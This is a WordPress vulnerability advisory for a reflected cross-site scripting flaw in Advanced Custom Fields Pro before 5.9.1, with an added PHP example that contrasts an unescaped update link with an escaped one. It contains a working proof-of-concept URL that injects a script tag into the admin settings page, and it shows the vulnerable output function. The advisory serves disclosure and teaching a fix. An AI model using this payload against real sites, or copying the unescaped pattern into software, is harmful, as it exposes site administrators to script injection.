WordPress Plugin Vulnerabilities

Advanced Custom Field Pro < 5.9.1 - Authenticated Reflected Cross-Site Scripting (XSS)

Description

The plugin did not properly escape the generated update URL when outputting it in an attribute, leading to a reflected Cross-Site Scripting issue in the update settings page.

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=acf-field-group&page=acf-settings-updates&"><script>alert('XSS')</script>
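The pattern described above, as an added illustration that is not the plugin's own code: a settings page builds a "check for updates" link from the current request URI and echoes it into an href attribute. build_update_url() and the two render functions are assumed names written for this example; the request URI is constructed here (with the advisory's PoC payload already decoded) to stand in for $_SERVER['REQUEST_URI'] as seen after query-string rebuilding.

```php
<?php
// Added example (not ACF code). Shows why an unescaped, request-derived URL
// inside an attribute becomes reflected XSS, and the escaped form beside it.

// Assumed helper: mimic a "generated update URL" by appending a flag to the
// current request URI (the same shape add_query_arg() produces when it is
// called without an explicit base URL).
function build_update_url(string $request_uri): string {
    $sep = (strpos($request_uri, '?') === false) ? '?' : '&';
    return $request_uri . $sep . 'check_updates=1';
}

// Vulnerable form: the URL is concatenated straight into the attribute.
// Any " in the URI closes the attribute and the rest lands in the page.
function render_update_link_unsafe(string $request_uri): string {
    $url = build_update_url($request_uri);
    return '<a class="button" href="' . $url . '">Check for updates</a>';
}

// Hardened form: escape for the attribute context before output.
// In WordPress the equivalent is esc_url() for an href (esc_attr() for
// other attributes); plain PHP is used here so the file runs on its own.
function render_update_link_safe(string $request_uri): string {
    $url  = build_update_url($request_uri);
    $attr = htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<a class="button" href="' . $attr . '">Check for updates</a>';
}

// Constructed request URI carrying the advisory's PoC, as it would look
// once the query string has been URL-decoded.
$poc = '/wp-admin/edit.php?post_type=acf-field-group&page=acf-settings-updates'
     . '&"><script>alert(\'XSS\')</script>';

$unsafe = render_update_link_unsafe($poc);
$safe   = render_update_link_safe($poc);

echo "Unsafe output:\n$unsafe\n\n";
echo "Escaped output:\n$safe\n\n";

// Self-check a reviewer can keep in a unit test: the escaped rendering must
// contain no raw tag and no unescaped quote from the request.
if (strpos($safe, '<script') !== false || strpos($safe, '">') !== strrpos($safe, '">')) {
    fwrite(STDERR, "escaping failed\n");
    exit(1);
}
echo "Escaped rendering contains no injected markup.\n";
```

Run it with the php CLI. The unsafe rendering prints the attribute closed early by the injected quote followed by a live script tag; the escaped rendering prints the same bytes as &quot;&gt;&lt;script&gt;... inside the href, which the browser treats as part of the link text of the URL rather than markup. The durable fix is the same in either world: escape at the output sink for the context it lands in, even when the value looks like something the application generated itself.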

Affects Plugins

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Juan David Ordoñez Noriega
Submitter
Juan David Ordoñez Noriega
Verified
Yes

Timeline

Publicly Published
2021-01-20
Added
2021-04-02
Last Updated
2021-06-09

Other